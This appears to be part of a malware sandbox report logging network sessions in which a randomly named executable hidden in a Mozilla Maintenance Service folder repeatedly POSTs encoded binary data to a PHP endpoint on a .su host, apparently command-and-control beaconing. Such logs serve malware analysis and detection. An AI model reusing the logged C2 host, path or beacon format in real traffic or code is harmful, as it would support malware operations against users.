                                                                    Mar 5, 2024 22:28:12.516841888 CET2596OUTData Raw: 54 50 54 58 5b 5e 50 50 5e 57 5a 51 57 5e 50 5c 54 53 54 5c 56 5d 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TPTX[^PP^WZQW^P\TST\V]WZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9;12V'U)'&:\,/)&(0%),V#/4T"$2*[,9%Z"!Q*
                                                                    Mar 5, 2024 22:28:12.753910065 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.54975691.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:13.085613966 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:13.295514107 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:13.295778036 CET2596OUTData Raw: 51 5b 51 59 5b 5f 50 50 5e 57 5a 51 57 5d 50 5e 54 5c 54 59 56 5e 57 55 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q[QY[_PP^WZQW]P^T\TYV^WUT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:;"%'36'-/,6\38$%93!<$V!?4&';$,-)%Z"!Q*9
                                                                    Mar 5, 2024 22:28:13.536344051 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.54975891.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:13.950212955 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:14.163256884 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:14.163600922 CET1920OUTData Raw: 51 5c 51 5c 5e 5e 55 55 5e 57 5a 51 57 5b 50 5b 54 53 54 52 56 55 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q\Q\^^UU^WZQW[P[TSTRVUWZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9C;%'!\0/,2'8\195$!(0Y%<%;9%Z"!Q*!
                                                                    Mar 5, 2024 22:28:14.402573109 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.54975991.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:14.069619894 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:14.281599998 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:14.281883001 CET2596OUTData Raw: 54 5f 54 51 5b 5e 55 54 5e 57 5a 51 57 51 50 59 54 55 54 5c 56 5d 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T_TQ[^UT^WZQWQPYTUT\V]W^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:;21$%\'*/*';;%*86T"<'$1,/9%Z"!Q*
                                                                    Mar 5, 2024 22:28:14.519728899 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    40192.168.2.54976191.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:14.870553970 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:15.080544949 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:15.080835104 CET2596OUTData Raw: 51 5b 51 5e 5e 5b 55 54 5e 57 5a 51 57 5a 50 52 54 50 54 5a 56 54 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q[Q^^[UT^WZQWZPRTPTZVTWXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9,!"W0"'5)-,1&8':$",;5'$$&:Z;%Z"!Q*%
                                                                    Mar 5, 2024 22:28:15.316240072 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    41192.168.2.54976291.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:15.650456905 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:15.863030910 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:15.863465071 CET2596OUTData Raw: 51 5d 54 51 5e 5d 55 51 5e 57 5a 51 57 5b 50 5c 54 57 54 5c 56 5f 57 5d 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q]TQ^]UQ^WZQW[P\TWT\V_W]T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9,*V031\$6_8<531Q!?$V5<7$B'Y1<!,%Z"!Q*!
                                                                    Mar 5, 2024 22:28:16.101322889 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    42192.168.2.54976391.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:16.445529938 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:16.654473066 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:16.654761076 CET2592OUTData Raw: 51 5c 51 5e 5b 59 50 57 5e 57 5a 51 57 59 50 52 54 5c 54 53 56 5a 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q\Q^[YPW^WZQWYPRT\TSVZWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:.1$!]'&//%$/Y%_06(Q",0;$<Z,)%Z"!Q*
                                                                    Mar 5, 2024 22:28:16.889998913 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    43192.168.2.54976491.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:17.227621078 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:17.438447952 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:17.438711882 CET2596OUTData Raw: 54 5a 51 5e 5e 5c 50 51 5e 57 5a 51 57 50 50 59 54 55 54 58 56 59 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TZQ^^\PQ^WZQWPPYTUTXVYWXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:;")'&36X,-'8;&*?#,'!<0'4&,)-9%Z"!Q*
                                                                    Mar 5, 2024 22:28:17.675271988 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    44192.168.2.54976591.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:18.006028891 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:18.212816000 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:18.213202000 CET2596OUTData Raw: 54 5e 54 59 5b 59 55 5d 5e 57 5a 51 57 58 50 5c 54 57 54 58 56 59 57 5d 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T^TY[YU]^WZQWXP\TWTXVYW]T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9A/"933_3&^/?&X'^'%<" ",''<&>X;9%Z"!Q*-
                                                                    Mar 5, 2024 22:28:18.445039034 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    45192.168.2.54976691.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:18.789153099 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:18.998939991 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:18.999337912 CET2596OUTData Raw: 54 5c 51 59 5b 5c 55 53 5e 57 5a 51 57 5b 50 5c 54 54 54 59 56 55 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T\QY[\US^WZQW[P\TTTYVUW^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9@,1.'#$%!;?_$(2:3"5#\&4Y%<9/9%Z"!Q*!
                                                                    Mar 5, 2024 22:28:19.238918066 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    46192.168.2.54976791.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:19.591794014 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:19.804528952 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:19.804761887 CET2596OUTData Raw: 54 5f 51 5b 5b 57 50 57 5e 57 5a 51 57 5c 50 5c 54 55 54 5b 56 5b 57 5d 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T_Q[[WPW^WZQW\P\TUT[V[W]T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9E8' "'6"\/6$(&<V"Z$P!Z70'4%,]/%Z"!Q*=
                                                                    Mar 5, 2024 22:28:20.045877934 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    47192.168.2.54976891.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:19.618768930 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:19.831635952 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:19.831800938 CET1920OUTData Raw: 54 5b 54 58 5b 59 55 5c 5e 57 5a 51 57 58 50 5f 54 51 54 53 56 5f 57 5f 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T[TX[YU\^WZQWXP_TQTSV_W_T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:8!03)'6%,?^3;#\10"/ P6,30<&,.8)%Z"!Q*-
                                                                    Mar 5, 2024 22:28:20.069880962 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    48192.168.2.54976991.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:20.381099939 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:20.593120098 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:20.593384981 CET2596OUTData Raw: 54 5f 51 5b 5e 5b 55 51 5e 57 5a 51 57 5a 50 5b 54 54 54 5e 56 5d 57 5f 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T_Q[^[UQ^WZQWZP[TTT^V]W_T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9D/!20!^3>_8X3+<2 W"?+5 0']&<,%Z"!Q*%
                                                                    Mar 5, 2024 22:28:20.834520102 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    49192.168.2.54977091.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:21.160624981 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:21.371062994 CET25INHTTP/1.1 100 Continue
